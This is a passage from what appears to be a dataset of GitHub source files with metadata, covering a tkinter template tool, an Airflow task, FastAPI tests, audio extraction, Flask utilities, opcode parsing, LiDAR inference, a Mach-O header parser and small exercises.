\"output_script\",row[folder_tag]))\n\t\t\t\n\t\t\t#script naming rule: include the row tag and the template name\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], templatename + \"_\" + row[rowname] + \".\"+ ext)\n\t\t\n\t\tif mergefile:\n\t\t\toutput_text_file = open(output_filepath, \"a\")\n\t\telse :\n\t\t\toutput_text_file = open(output_filepath, \"w\")\n\t\toutput_text_file.write(result)\n\t\toutput_text_file.close()\n\t\tprint(\"write successful\", data, \"to\", output_filepath)\n\t\t#do not print this to the textbox, it is too verbose and hard to read\n\t\t#print_to_textbox(\"write successful script \"+ output_filepath)\n\n#########################\n\ndef loadprofile_package():\n\t#turn the button yellow to show the run started ==> for troubleshooting\n\tloadprofile_package_button.configure(bg = 'yellow')\n\tt.start()\n\tt1.start()\n\tprint(\"loadprofile_package button press!!\")\n\tprofile_package_filename_selected = om_profile_package_var.get()\n\tprint(profile_package_filename_selected)\n\tclear_textbox()\n\tprint_to_textbox(\"Profile package selected: \"+profile_package_filename_selected)\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\t\n\twith open(os.path.join(home_path,\"profile\",\"profile_package\",profile_package_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\t#print(data_dict)\n\t\tprofile_package_name = data_dict['package_name']\n\t\tprofiles_filepath = data_dict['profiles_filepath']\n\t\tno_of_profile = len(profiles_filepath)\n\t\tprint(profile_package_name)\n\t\tprint(profiles_filepath)\n\t\t#print_to_textbox(\"profile_package_name \"+profile_package_name)\n\t\t#print_to_textbox(\"-----------------------------------------\")\n\t\t\n\t\tcount_profile = 0\n\t\tfor profile_filepath in profiles_filepath:\n\t\t\tcount_profile += 1\n\t\t\t#print_to_textbox(profile_filepath)\n\t\t\tprint(\"Loading \",get_filename(profile_filepath), 
count_profile, \"/\", no_of_profile, \"profiles\")\n\t\t\tprint_to_textbox(\"Loading \" + get_filename(profile_filepath) + \" \" + str(count_profile)+ \"/\"+str(no_of_profile) +\" profiles\")\n\t\t\t\n\t\t\tloadprofile_procedure(profile_filepath)\n\t\n\t#turn the button green to show the run succeeded\n\tloadprofile_package_button.configure(bg = 'green2')\n\ttext_var_status.set(\"FINISHED:\" +profile_package_filename_selected)\n\t\n\tt.stop()\n\tt1.stop()\ndef press_merge_folder_button():\n\tprint(\"press_merge_folder_button press !!!\")\n\tmerge_folder_path = filedialog.askdirectory()\n\tprint(merge_folder_path)\n\tclear_textbox()\n\tprint_to_textbox(\"Merge folder path: \\n\"+merge_folder_path)\n\t\n\tfilenames = []\n\tfilepaths = []\n\t#merge_name = \"test_merge.txt\"\n\tmerge_name = text_var_mergefilename.get()\n\t\n\tprint_to_textbox(\"Merged successfully to the file paths below:\")\n\tfor path, subdirs, files in os.walk(merge_folder_path):\n\t\tprint(\"--------------------------------\")\n\t\t#sort the file names before writing\n\t\tfor file in sorted(files):\n\t\t\tprint(path,\"|\",subdirs, \"|\" , files)\n\t\t\twith open(os.path.join(path,merge_name), \"a\") as outfile:\n\t\t\t\t#write small file to big file\n\t\t\t\t#outfile.write(file+\"\\n\")\n\t\t\t\twith open(os.path.join(path,file), \"r\") as infile:\n\t\t\t\t\toutfile.write(infile.read())\n\t\tprint_to_textbox(os.path.join(path,merge_name))\n\t\n\t#print(\"Successful merge all subfolder to file name\",merge_name, \"in each sub folder\")\n\t#print_to_textbox(\"Successful merge all subfolder to file name \"+ merge_name + \" in each sub folder\")\n\t\n\tmerger_folder_button.configure(bg = 'green2')\n\nroot = tk.Tk()\nroot.title(\"SCRIPTING_\"+version)\n#root.geometry(\"550x550\")\n\n\n\n\n\ntext_var_inputpath = tk.StringVar()\ntext_var_templatepath = tk.StringVar()\ntext_var_status = tk.StringVar()\ntext_var_status.set(\"STATUS: PLS SELECT EXCEL OR CHOOSE PROFILE\")\ntext_var_packagename = tk.StringVar()\ntext_var_mergefilename = tk.StringVar()\n\nglobal om_folder_var\nom_folder_var = tk.StringVar(root)\n#om_folder_var.set(\"6.Select tag\")\nom_folder_var.set(\"\")\n\n##row1\nbtn_browse_text = tk.StringVar()\nbtn_browse_text.set(\"01.EXCEL\")\nbrowse_button = tk.Button(root, textvariable=btn_browse_text, command = browse_datainput_button)\nbrowse_button.grid(row=0, column=0, columnspan=3, sticky=\"ew\")\norig_color = browse_button.cget(\"background\") #to help reset color\n\n#the folder tag menu is created dynamically after the excel file is selected\n###end row1\n\n##row2\nbrowse_template_button= tk.Button(root, text =\"03.TEMPL\", command = browse_template_button)\nbrowse_template_button.grid(row=1, column=1)\nentry_templatefilepath = tk.Entry(root, textvariable = text_var_templatepath)\nentry_templatefilepath.grid(row=1, column=2, sticky=\"ew\", columnspan=2)\n##end row2\n\n#row3\n\n#row3, the filename tag menu is created dynamically after a sheet is selected\n#endrow3\n\n#row4\nvar_foldersplit = tk.IntVar(value=0)\nfoldersplit_checkbox = tk.Checkbutton(root, text=\"05.FOLDER SPLIT\", variable=var_foldersplit, command = folder_option_status_change)\nfoldersplit_checkbox.grid(row=3,sticky=\"w\", column=2)\n\nfoldersplit_checkbox.configure(state='disabled')\n#end row 4\n\n##row5\ncreate_button= tk.Button(root, text =\"05.CREATE\", command = fill_template)\ncreate_button.grid(row=4, column=1)\ncreate_button.configure(state='disabled')\n##end row5\n\n##row6\ntk.Button(root, text =\"06.BACKUP\", command = save_profile_press).grid(row=5, column=1)\n\ntk.Label(root, 
text=\"package_name\").grid(row=5, column=2, sticky=\"w\")\nentry_packagename = tk.Entry(root, textvariable = text_var_packagename)\n#entry_packagename.grid(row=5, column=2, sticky=\"e\")\nentry_packagename.grid(row=5, column=2, sticky=\"\") #central allign\n##end row6\n\n##row7\nprofile_files = ls_name(os.path.join(home_path,'profile'))\nchoices = profile_files\nom_profile_var = tk.StringVar(root)\nom_profile_var.set(\"07.Select a profile\")\n#profile_select = tk.OptionMenu(root, om_profile_var, *choices)\nprofile_select = tk.OptionMenu(root, om_profile_var, *choices,command=lambda _: show_profile_to_textbox())\n#mymenu = OptionMenu(root, optionvar, *t, command=lambda _: update())\nprofile_select.grid(row=6, column=2, sticky=\"ew\", columnspan=2)\n#end row7\n\n##row8\nprofile_package_files = ls_name(os.path.join(home_path,'profile','profile_package'))\nchoices = profile_package_files\nom_profile_package_var = tk.StringVar(root)\nom_profile_package_var.set(\"07.1.Select a profile package\")\nprofile_package_select = tk.OptionMenu(root, om_profile_package_var, *choices,command=lambda _: show_profile_package_to_textbox())\n#mymenu = OptionMenu(root, optionvar, *t, command=lambda _: update())\nprofile_package_select.grid(row=7, column=2, sticky=\"ew\", columnspan=2)\n#end row8\n\n#row9\nlog_textbox = tk.Text(root, height=15)\nlog_textbox.grid(row=8, column=2, sticky=\"ew\",columnspan=2)\n#end row9\n\n#row10\nloadprofile_button= tk.Button(root, text =\"08.LOAD PROFILE & CREATE SCRIPT\", command = loadprofile)\nloadprofile_button.grid(row=9, column=2, sticky=\"ew\", columnspan=2)\nloadprofile_button.configure(state='disabled')\n#end row10\n\n#row11\nloadprofile_package_button= tk.Button(root, text =\"08.1.LOAD PROFILE PACKAGE & CREATE SCRIPT\", command = loadprofile_package)\nloadprofile_package_button.grid(row=10, column=2, sticky=\"ew\", columnspan=2)\nloadprofile_package_button.configure(state='disabled')\n#end row11\n\n##row12\nmerge_folder_btn_text = tk.StringVar()\nmerge_folder_btn_text.set(\"MERGE_FD\")\nmerger_folder_button = tk.Button(root, textvariable=merge_folder_btn_text, command = press_merge_folder_button)\nmerger_folder_button.grid(row=11, column=1)\n\n#tk.Label(root, text=\"package_name\").grid(row=5, column=2, sticky=\"w\")\nentry_mergefilename = tk.Entry(root, textvariable = text_var_mergefilename)\ntext_var_mergefilename.set(\"merged_file_name\")\nentry_mergefilename.grid(row=11, column=2, sticky=\"w\")\n##end row12\n\n\n##row13\nstatus_label = tk.Label(root, textvariable =text_var_status)\nstatus_label.grid(row=12, column=1, columnspan=3)\n##end row13\n\n\n\nroot.mainloop()\n","repo_name":"ecaohuy/pythonlab","sub_path":"fill_template - Copy.py","file_name":"fill_template - Copy.py","file_ext":"py","file_size_in_byte":29019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20256365531","text":"from airflow.decorators import task\nimport requests\nimport json\n\n@task\ndef discover_ids(**kwargs):\n print(\"params: %s\" % kwargs[\"params\"])\n coll_id = kwargs[\"params\"][\"collection_id\"]\n resp = requests.get(\"https://api.eumetsat.int/data/search-products/os?format=json&pi=%s&si=0&c=5&sort=start,time,0&dtstart=2021-06-17T09:02:58Z&dtend=2021-06-18T09:02:58Z\" % coll_id)\n\n data = json.loads(resp.text)\n ids = list(map(lambda f: f[\"id\"], data[\"features\"]))\n result_value = json.dumps(ids)\n \n print(result_value)\n return {\"ids\": 
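The discover_ids task above interpolates the collection id straight into the query string; a sketch of the same OpenSearch request built with requests' params argument, which handles URL encoding for you:

# Same query as above, but letting requests encode the query string.
resp = requests.get(
    "https://api.eumetsat.int/data/search-products/os",
    params={"format": "json", "pi": coll_id, "si": 0, "c": 5,
            "sort": "start,time,0",
            "dtstart": "2021-06-17T09:02:58Z", "dtend": "2021-06-18T09:02:58Z"})
ids = [f["id"] for f in resp.json()["features"]]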
result_value}\n\n","repo_name":"matthesrieke/airflow-sandbox","sub_path":"dags/tasks/discover.py","file_name":"discover.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74910522386","text":"from fastapi.testclient import TestClient\n\nfrom main import app, InferenceInput\n\nclient = TestClient(app)\n\nlow_salary_example = {\n 'age': 39,\n 'workclass': 'State-gov',\n 'fnlgt': 77516,\n 'education': 'Bachelors',\n 'education-num': 13,\n 'marital-status': 'Never-married',\n 'occupation': 'Adm-clerical',\n 'relationship': 'Not-in-family',\n 'race': 'White',\n 'sex': 'Male',\n 'capital-gain': 2174,\n 'capital-loss': 0,\n 'hours-per-week': 40,\n 'native-country': 'United-States'\n}\n\nhigh_salary_example = {\n \"age\": 42,\n \"workclass\": \"Private\",\n \"fnlgt\": 159449,\n \"education\": \"Bachelors\",\n \"education-num\": 13,\n \"marital-status\": \"Married-civ-spouse\",\n \"occupation\": \"Exec-managerial\",\n \"relationship\": \"Husband\",\n \"race\": \"White\",\n \"sex\": \"Male\",\n \"capital-gain\": 5178,\n \"capital-loss\": 0,\n \"hours-per-week\": 40,\n \"native-country\": \"United-States\",\n}\n\n\ndef test_root():\n r = client.get(\"/\")\n assert r.status_code == 200\n assert r.json() == {\"message\": \"Hello World\"}\n\n\ndef test_low_salary():\n r = client.post(\"/inference/\", json=low_salary_example)\n assert r.status_code == 200\n assert r.json() == {\"prediction\": \"['<=50K']\"}\n\n\ndef test_high_salary():\n r = client.post(\"/inference/\", json=high_salary_example)\n assert r.status_code == 200\n assert r.json() == {\"prediction\": \"['>50K']\"}\n","repo_name":"KennerBenjamin/udacity-api","sub_path":"test_inference_api.py","file_name":"test_inference_api.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44023443645","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 8 19:12:39 2021\r\n\r\n@author: jahtzee\r\n\"\"\"\r\n\r\nfrom os import *\r\nfrom moviepy.editor import *\r\npath = \"C:/Users/admin/Music/tmp\"\r\noutput = \"C:/Users/admin/Music/tmp/output\"\r\n\r\ndef extractMP3fromMP4(mp4, mp3):\r\n videoclip=VideoFileClip(mp4)\r\n audioclip=videoclip.audio\r\n audioclip.write_audiofile(mp3)\r\n audioclip.close()\r\n videoclip.close()\r\n \r\nif __name__ == \"__main__\":\r\n filelist = listdir(path)\r\n for file in filelist:\r\n if file.endswith(\".mp4\"):\r\n extractMP3fromMP4(path+\"/\"+file, output+\"/\"+file+'.mp3')\r\n \r\n ","repo_name":"jahtzee/VideoAudioExtractor","sub_path":"VideoAudioExtractor.py","file_name":"VideoAudioExtractor.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23620248255","text":"import importlib\nfrom datetime import datetime\nfrom functools import partial, wraps\n\nfrom flask import request, current_app, jsonify\nfrom flask_login import current_user\nfrom jsonschema import validate\n\nfrom .constant import UserType\nfrom .exceptions import OK\n\n\ndef import_class(module_class_name):\n module_name, _, class_name = module_class_name.rpartition('.')\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n\nclass HashableDict(dict):\n def __hash__(self):\n return hash(tuple(sorted(self.items())))\n\n\ndef validate_time_format(time_str, expected_format, err_message=''):\n try:\n 
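The tests above exercise an app imported from main, which is not shown here; a minimal self-contained illustration of the FastAPI/TestClient pattern they rely on (this toy app is not the project's real main.py):

from fastapi import FastAPI
from fastapi.testclient import TestClient

toy_app = FastAPI()

@toy_app.get("/")
def root():
    # Mirrors the behaviour the first test expects from the real app.
    return {"message": "Hello World"}

toy_client = TestClient(toy_app)
r = toy_client.get("/")
assert r.status_code == 200 and r.json() == {"message": "Hello World"}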
datetime.strptime(time_str, expected_format)\n except Exception:\n raise ValueError(err_message)\n\n\ndef payload_validator(payload_field):\n def real_decorator(method, **kwargs):\n\n @wraps(method)\n def wrapper(*args, **kwargs):\n payload = request.get_json(force=True)\n validate(payload, payload_field)\n\n return method(*args, **kwargs, payload=payload)\n\n return wrapper\n\n return real_decorator\n\n\ndef json_response(data=None):\n info = {\n 'code': OK.code,\n 'message': OK.message\n }\n if data is None:\n return jsonify(info=info)\n\n return jsonify(data=data, info=info)\n\n\ndef login_required(func=None, user_type=UserType.ADMIN):\n if func is None:\n return partial(login_required, user_type=user_type)\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if current_app.login_manager._login_disabled:\n return func(*args, **kwargs)\n if not (current_user.is_authenticated and current_user.type == user_type):\n return current_app.login_manager.unauthorized()\n return func(*args, **kwargs)\n return wrapper\n\n\ndef permit_params(params, keys):\n return {key: value for key, value in params.items() if key in keys}\n","repo_name":"entryword/react-project","sub_path":"pyladies/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"27242282139","text":"from pyparsing import Word, hexnums, WordEnd, Optional, alphas, alphanums\r\nimport os\r\nimport pandas as pd\r\n\r\ndef extraction_code(file_name):\r\n hex_integer = Word(hexnums) + WordEnd()\r\n line = (\r\n \".text:\"\r\n + hex_integer\r\n + Optional((hex_integer * (1,))(\"instructions\") + Word(alphas, alphanums)(\"opcode\"))\r\n )\r\n opcodes=[]\r\n with open(file_name) as source:\r\n for source_line in source:\r\n source_line = source_line.strip()\r\n if source_line[:5] == \".text\":\r\n result = line.parseString(source_line)\r\n if \"opcode\" in result:\r\n opcodes.append(result.opcode)\r\n elif source_line[:5] != \".text\":\r\n pass\r\n else:\r\n break\r\n extracted_seq=\" \".join(opcodes)\r\n data = {'clean_seq':extracted_seq}\r\n os.remove(file_name)\r\n return data\r\n#extraction_code(file_data)\r\n","repo_name":"sarasap/mal","sub_path":"Extraction.py","file_name":"Extraction.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"43162401547","text":"####################################################################################\n# HLD BUILDING BLOCK: INFERENCE #\n####################################################################################\n# Run the test.\n# Compute the metrics (e.g. 
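A quick exercise of the pyparsing grammar defined in Extraction.py, on one made-up IDA-style disassembly line:

# Made-up disassembly line to show what the grammar extracts.
result = line.parseString(".text:00401000 55 push ebp")
print(result.opcode)              # should print: push
print(list(result.instructions))  # should print: ['55']
# Caveat: an opcode spelled only with hex letters (e.g. 'add') would be
# consumed by the hex-byte matcher, since a-f are also valid hex digits.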
accuracy) obtained.\n####################################################################################\n\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nfrom B0_Dataset.dataset import SemanticKittiDataset\nfrom D0_Modeling.model import SegmentationPointNet\nfrom torch.utils.data import DataLoader\n# from A0_Configuration.hyperparam import opt\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nimport numpy as np\nimport shutil\nimport yaml\n\ndef test(opt):\n test_dataset = SemanticKittiDataset(\n dst_hparamDatasetPath=opt.hparamDatasetPath,\n dst_hparamDatasetSequence=opt.hparamTestDatasetSequence,\n dst_hparamYamlConfigPath=opt.hparamYamlConfigPath,\n dst_hparamNumberOfRandomPoints=False,\n dst_hparamActionType='test') \n\n test_dataloader = DataLoader(\n dataset = test_dataset,\n batch_size=1,\n shuffle=False)\n\n num_classes=opt.hparamNumberOfClasses\n feature_transform=opt.hparamFeatureTransform\n\n # Load model from .pth\n model = SegmentationPointNet(num_classes, feature_transform)\n model.load_state_dict(torch.load(opt.hparamModelPthPath, map_location=torch.device('cpu')))\n model.eval()\n\n # Prepare predictions env\n predictions_path = os.path.join(opt.hparamDatasetPath, opt.hparamTestDatasetSequence, 'predictions')\n\n if os.path.exists(predictions_path):\n # os.remove(predictions_path)\n shutil.rmtree(predictions_path)\n os.mkdir(predictions_path)\n\n with open(opt.hparamYamlConfigPath, 'r') as stream:\n yaml_config = yaml.safe_load(stream)\n\n learning_map_inv = yaml_config['learning_map_inv']\n\n # Testing loop\n print(\"Start generating predictions .labels\")\n for i, data in enumerate(test_dataloader):\n \n points, target = data\n points = points.transpose(2, 1)\n points, target = points.to(opt.hparamDeviceType), target.to(opt.hparamDeviceType)\n \n model = model.eval()\n \n pred, feat_trans = model(points)\n pred = pred.view(-1, num_classes)\n # target = target.view(-1, 1)[:, 0]\n # loss = F.nll_loss(pred, target)\n pred_choice = pred.data.max(1)[1]\n # correct = pred_choice.eq(target.data).cpu().sum()\n \n # print(f\"target: {target}, pred: {pred}, pred_choice: {pred_choice}, correct: {correct}\")\n\n #Save predictions\n pred_choice_tmp = [learning_map_inv[k] for k in pred_choice.numpy().tolist()]\n pred_choice_conv = np.array(pred_choice_tmp).astype(np.uint32)\n file_name = os.path.basename(test_dataloader.dataset.pc_files[i])\n pred_file_path = os.path.join(\n predictions_path,\n file_name.replace('.bin', '.label')\n )\n pred_choice_conv.tofile(pred_file_path)\n\n print('Prediction generation completed') \n ","repo_name":"pdymek/Workspace-AD-LiDAR","sub_path":"C1_Inference/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} {"seq_id":"22457778286","text":"from utils.header import MagicField, Field\nfrom load_command import LoadCommandCommand, LoadCommandHeader\n\n\nclass SourceVersionField(Field):\n def display(self, header):\n if self.mnemonic:\n value = self._get_value(header)\n a = (value >> 40) & 0xffffff\n b = (value >> 30) & 0x3ff\n c = (value >> 20) & 0x3ff\n d = (value >> 10) & 0x3ff\n e = value & 0x3ff\n return '%d.%d.%d.%d.%d' % (a, b, c, d, e)\n return super(SourceVersionField, self).display(header)\n\n\nclass SourceVersionCommand(LoadCommandHeader):\n ENDIAN = None\n FIELDS = (\n 
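The predictions above are written as raw uint32 arrays with numpy's tofile; a small sketch for reading one back as a sanity check (the path is illustrative):

# Read a generated .label file back and inspect the remapped class ids.
labels = np.fromfile('predictions/000000.label', dtype=np.uint32)
print(labels.shape, np.unique(labels))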
{LoadCommandCommand.COMMANDS['LC_SOURCE_VERSION']: 'LC_SOURCE_VERSION'}),\n Field('cmdsize', 'I'),\n SourceVersionField('version', 'Q'),\n )\n\n def __init__(self, bytes_=None, **kwargs):\n self.version = None\n super(SourceVersionCommand, self).__init__('source_version_command', bytes_, **kwargs)\n","repo_name":"hkkwok/MachOTool","sub_path":"mach_o/headers/source_version_command.py","file_name":"source_version_command.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"24867883634","text":"# mixed tests of py basics \n\n\n\na, b = 0, 1\n\n\nwhile b < 1000:\n print(b, end=' ', flush = True)\n a, b = b, a + b\n \n\nprint() # line ending\n\n# test functions\ndef fun(n): \n print(n) \n\nfun(47)\n\n\n# bitwise \n\nx = 0x0a\ny = 0x02\nz= x & y\n\nprint(f'(hex) x is {x:02x}, y is {y:02x}, z is {z:02x}')\nprint(f'(bin) x is {x:08b}, y is {y:08b}, z is {z:08b}')\n","repo_name":"nbatwara/PyTrain","sub_path":"PyEssential/mixed.py","file_name":"mixed.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3304068983","text":"#!/bin/python3\n\nimport os\nimport sys\nimport heapq\n#\n# Complete the cookies function below.\n#\ndef cookies(k, A):\n \n heapq.heapify(A)\n count = 0\n while A[0] < k:\n if len(A) < 2: return -1\n lowest = heapq.heappop(A)\n new_lowest = heapq.heappop(A)\n heapq.heappush(A, lowest + 2 * new_lowest)\n count += 1\n return count\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nk = input().split()\n\n n = int(nk[0])\n\n k = int(nk[1])\n\n A = list(map(int, input().rstrip().split()))\n\n result = cookies(k, A)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Infinidrix/competitive-programming","sub_path":"Take 2 Week 5/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13230497159","text":"import unittest\n\n\ndef _stepPerms(currentStep, totalSteps, mem):\n if currentStep > totalSteps:\n return 0\n elif currentStep == totalSteps:\n return 1\n elif currentStep in mem:\n return mem[currentStep]\n\n result = _stepPerms(currentStep+1, totalSteps, mem) \\\n + _stepPerms(currentStep+2, totalSteps, mem) \\\n + _stepPerms(currentStep+3, totalSteps, mem)\n\n mem[currentStep] = result\n return result\n\n\n# Complete the stepPerms function below.\ndef stepPerms(n):\n return _stepPerms(0, n, {})\n\n\nclass DavidStaircaseTest(unittest.TestCase):\n def testCases(self):\n tests = [(1, 1), (3, 4), (7, 44)]\n for i in range(len(tests)):\n with self.subTest(i=i):\n test = tests[i]\n self.assertEqual(stepPerms(test[0]), test[1])\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"addinkevin/programmingchallenges","sub_path":"HackerRank/InterviewPreparationKit/RecursionAndBacktracking/davidstaircase.py","file_name":"davidstaircase.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5629619713","text":"import baseTools\r\nimport checkerBaseOperators\r\nimport action\r\n\r\ndef stats_part(base, cat_id):\r\n part_links = baseTools.take_links(base, cat_id)\r\n part_sees = baseTools.take_links(base, cat_id)\r\n part_in = checkerBaseOperators.part_split_IN_OUT(base, cat_id)['IN']\r\n part_out = 
checkerBaseOperators.part_split_IN_OUT(base, cat_id)['OUT']\r\n \r\n export_dict = {\r\n 'SENTENS' : len(part_sees),\r\n 'LINKS' : len(part_links),\r\n 'PART-IN' : len(part_in),\r\n 'PART-OUT' : len(part_out),\r\n 'TOTAL' : len(part_links) + len(part_sees) + len(part_in) + len(part_out)\r\n }\r\n return export_dict\r\n\r\ndef generator_AI_most_popular(base, cat_start_id, no_words = 5, exceping_part = None):\r\n '------ ------ ------ ------ ------ ------ ------ ------ ----- ----- -'\r\n 'Word generator based on stats --> works well but is biased'\r\n '------ ------ ------ ------ ------ ------ ------ ------ ----- ----- -'\r\n cat_word = baseTools.take_word(base, cat_start_id)\r\n publish_string = f'{cat_word} '\r\n publish_list = [cat_start_id]\r\n for _ in range(no_words):\r\n classic_set = checkerBaseOperators.part_split_IN_OUT(base, cat_start_id)['OUT']\r\n if len(classic_set) > 0 and cat_start_id != None:\r\n links = [this for this in classic_set]\r\n cat_start_id = checkerBaseOperators.part_most_popular(base, links, exceping_part)\r\n else:\r\n break\r\n if cat_start_id != None:\r\n if not cat_start_id in publish_list:\r\n publish_list.append(cat_start_id)\r\n cat_word = baseTools.take_word(base, cat_start_id)\r\n count_word_in = publish_string.count(cat_word)\r\n else:\r\n break\r\n if count_word_in == 0:\r\n publish_string += f'{cat_word} '\r\n publish_string = publish_string[:len(publish_string)-1]\r\n return {'STRING' : publish_string, 'ID' : publish_list}\r\n\r\ndef generator_AI_se(base, word, settings = 'PR, PO, OZ, OR, OR, ZA, OK, DO'):\r\n '------ ------ ------ ------ ------ ------ ------ ------ -----'\r\n 'Word generator based on random choice and stats --> works so-so'\r\n '------ ------ ------ ------ ------ ------ ------ ------ -----'\r\n def pick_side_part(cat, item_list):\r\n import random\r\n\r\n words_dict = {}\r\n for item in item_list:\r\n if not item.startswith('LB') and item.startswith(cat):\r\n if not item.startswith('OR'):\r\n total_word = stats_part(base, item)[\"TOTAL\"]\r\n words_dict[item] = total_word\r\n ccounter = 0\r\n for v in words_dict.values():\r\n if v > ccounter:\r\n ccounter = v\r\n for k, v in words_dict.items():\r\n if v == ccounter and v > 4:\r\n print(cat, k, v, ccounter)\r\n return k\r\n \r\n i_set = set()\r\n for item in item_list:\r\n if item.startswith(cat):\r\n i_set.add(item)\r\n if len(i_set) != 0:\r\n for item in item_list:\r\n if not item.startswith('LB') and not item.startswith('OR'):\r\n i_set.add(item)\r\n if len(i_set) != 0:\r\n choice_list = []\r\n for x in i_set:\r\n choice_list.append(x)\r\n return random.choice(choice_list)\r\n else: return 'False'\r\n \r\n setts = settings.replace(' ', '').split(',')\r\n setts_list = [[setts[x], None] for x in range(len(setts))]\r\n word_id = None\r\n cat_start = None\r\n choice_list = []\r\n word_ID_pick_left = 'False'\r\n word_ID_pick_right = 'False'\r\n for b_CAT in base.keys():\r\n if b_CAT != 'SE' and b_CAT != 'LB' and b_CAT != 'ZA' and b_CAT != 'LID' \\\r\n and b_CAT != 'BASE' and b_CAT != 'SA':\r\n for v in base[b_CAT]:\r\n if v == word:\r\n # print(b_CAT)\r\n counter_index = 0\r\n for x in setts:\r\n if x.startswith(b_CAT):\r\n cat_start = counter_index\r\n break\r\n counter_index += 1\r\n if cat_start != None:\r\n word_id = baseTools.take_id(base, b_CAT, word)\r\n setts_list[cat_start] = [b_CAT, word_id]\r\n choice_list.append(word_id)\r\n else:\r\n print(f'No ID found for the word: {word}')\r\n break\r\n if cat_start != None:\r\n if cat_start != 0 and cat_start != 
len(setts_list) -1:\r\n top_part = setts_list[cat_start][1]\r\n words_link = baseTools.take_links(base, top_part)\r\n\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_left = pick_side_part(setts[cat_start - 1], words_link)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n break\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_right = pick_side_part(setts[cat_start + 1], words_link)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n break\r\n\r\n if word_ID_pick_left != word_ID_pick_right:\r\n setts_list[cat_start + 1][1] = word_ID_pick_right\r\n setts_list[cat_start - 1][1] = word_ID_pick_left\r\n\r\n for back in range(cat_start -1, 0, -1):\r\n fron_part_id = setts_list[back + 1][1]\r\n # print(fron_part_id)\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_left = pick_side_part(setts[back -1], links_front)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n \r\n break\r\n \r\n setts_list[back - 1][1] = word_ID_pick_left\r\n else: break\r\n for front in range(cat_start + 1, len(setts) - 1, 1):\r\n fron_part_id = setts_list[front - 1][1]\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_right = pick_side_part(setts[front -1], links_front)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n break\r\n setts_list[front + 1][1] = word_ID_pick_right\r\n else: break\r\n if cat_start == 0:\r\n top_part = setts_list[cat_start][1]\r\n words_link = baseTools.take_links(base, top_part)\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_right = pick_side_part(setts[cat_start + 1], words_link)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n break\r\n setts_list[cat_start + 1][1] = word_ID_pick_right\r\n for front in range(cat_start + 1, len(setts) - 1, 1):\r\n fron_part_id = setts_list[front - 1][1]\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_right = pick_side_part(setts[front + 1], links_front)\r\n if word_ID_pick_right != 'False':\r\n if not word_ID_pick_right in choice_list:\r\n choice_list.append(word_ID_pick_right)\r\n \r\n break\r\n setts_list[front + 1][1] = word_ID_pick_right\r\n else: break\r\n if cat_start == len(setts_list) -1:\r\n top_part = setts_list[cat_start][1]\r\n words_link = baseTools.take_links(base, top_part)\r\n for _ in range(len(words_link) * 5):\r\n word_ID_pick_left = pick_side_part(setts[cat_start - 1], words_link)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n \r\n break\r\n setts_list[cat_start - 1][1] = word_ID_pick_left\r\n for back in range(cat_start -1, 0, -1):\r\n fron_part_id = 